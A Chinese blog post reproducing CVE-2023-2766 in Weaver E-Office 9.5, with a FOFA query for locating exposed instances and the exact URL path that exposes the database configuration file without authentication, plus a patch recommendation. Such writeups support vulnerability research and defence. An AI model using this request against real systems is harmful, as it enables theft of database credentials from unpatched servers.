泛微E-Office信息泄露漏洞复现

最新推荐文章于 2024-04-14 14:27:18 发布
最新推荐文章于 2024-04-14 14:27:18 发布
阅读量563 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134355783
版权

简介

Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。

漏洞编号:CVE-2023-2766

漏洞复现

FOFA语法:

app="泛微-EOffice"

访问界面如下:

POC:/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

拼接URL进行访问:

https://IP:PORT//building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

成功访问到数据库配置文件。

修复建议

厂商已发布升级补丁以修复漏洞,升级至新版本

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!

结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现泛微E-Office信息泄露漏洞(CVE-2023-2766)
失心少年
11-21 631
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Weaver E-Office 9.5版本存在安全漏洞。Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。Weaver E-Office 9.5版本。
CVE-2023-2766:泛微E-Office信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-14 1651
Weaver E-Office 9.5版本存在configfile存在信息泄露。攻击者利用该漏洞可以访问文件或目录。
漏洞复现--泛微E-Office信息泄露(CVE-2023-2766)
qq_53003652的博客
11-09 628
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品configfile。目前厂商已发布升级补丁以修复漏洞
复现泛微-EOfficeOA信息泄露漏洞_41
fushuang333的博客
02-06 914
复现泛微-EOfficeOA信息泄露漏洞,未授权导致一些敏感配置信息泄露,可能造成系统危害以及重要信息泄露
泛微E-Office敏感信息泄露和未授权访问漏洞
08-03 1759
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件可以灵活设置短信发送的相关信息,例如短信签名、短信内容等。 泛微e-office短信插件是泛微e-office平台的一款功能插件,用于实现短信发送的功能。通过设置泛微e-office短信插件和泛微短信接口...
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含...2. 登录未升级的系统,单击窗口右上角【版本信息】查看必须是【10.0_20180119】及以上版本:
泛微e-office系统存在SQL注入漏洞
holyxp的博客
11-02 856
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
漏洞复现泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现
做自己喜欢的事,并将其发挥到极致!
09-12 777
泛微e-office OfficeServer2.php 存在任意文件读取漏洞,攻击者可通过构造特定Payload获取敏感数据信息
漏洞复现--泛微E-Office前台文件读取漏洞
qq_53003652的博客
10-08 371
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。app=“泛微-EOffice
泛微e-office系统存在敏感信息泄露POC软件
nnn2188185的博客
02-21 231
泛微e-office系统存在敏感信息泄露
泛微e-office系统敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-24 602
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
WuThreat身份安全云-TVD每日漏洞情报-2023-05-19
wuthreat无胁科技的博客
05-19 1075
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-2766,CNNVD-202305-1694。
漏洞复现泛微-eoffice10-laravel-反序列化
知黑而守白
03-29 370
E-Office泛微旗下标准协同办公平台,本着简洁易用、高效智能的原则,致力于为企业打造移动互联的无纸化、数字化办公平台。该漏洞主要是由与系统使用的laravel框架存在反序列化漏洞,从而通过构造特殊的数据包,达到命令执行。
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 4364
泛微最新漏洞汇总
泛微最新漏洞汇总----实时更新!!!_泛微漏洞,2024年最新为什么网络安全能最好地改变网络安全
2401_83974087的博客
04-14 748
q=0.9!!Win64;x64;;v=b3;x64;;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值